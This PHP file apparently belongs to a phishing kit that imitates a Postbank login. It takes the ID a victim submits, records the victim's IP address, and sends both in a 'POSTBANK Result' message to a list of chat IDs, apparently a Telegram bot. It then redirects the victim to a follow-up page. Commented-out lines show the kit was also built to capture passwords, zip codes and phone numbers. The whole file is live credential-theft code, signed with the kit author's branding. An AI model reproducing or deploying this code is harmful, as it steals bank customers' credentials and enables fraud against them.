<?php 
require '../../main.php';
require "fun.php";

if(isset($_POST['oneid'])){
$type = post('oneid');
//$login = post('Username1');
//$pass = post('Username2');
//$zipo = post('Username3');
//$tel = post('Username4');
$res = urlencode("
➡️ POSTBANK Result ..
🌐 Victim IP : ".ip()."

👳‍ID : $type
📱Password is comming : $tel
   
   ⭐⭐⭐
   
   ⚡️丂 卄 卂 ᗪ ㄖ 山 ㄥ 乇 ᘜ 乇 几 ᗪ ™️ ⚡️
");
foreach($chat_ids as $chat_id){
	send($res, $chat_id);
}

//go("../wait.php?userid={$id}&ue={$ue}?page=Login");
//go("../wait.php?page=Login");
go("../passos.php?userid={$id}&ue={$ue}&page=Login");
//header("Location: ../pasos.php?page=Login");
//exit();

}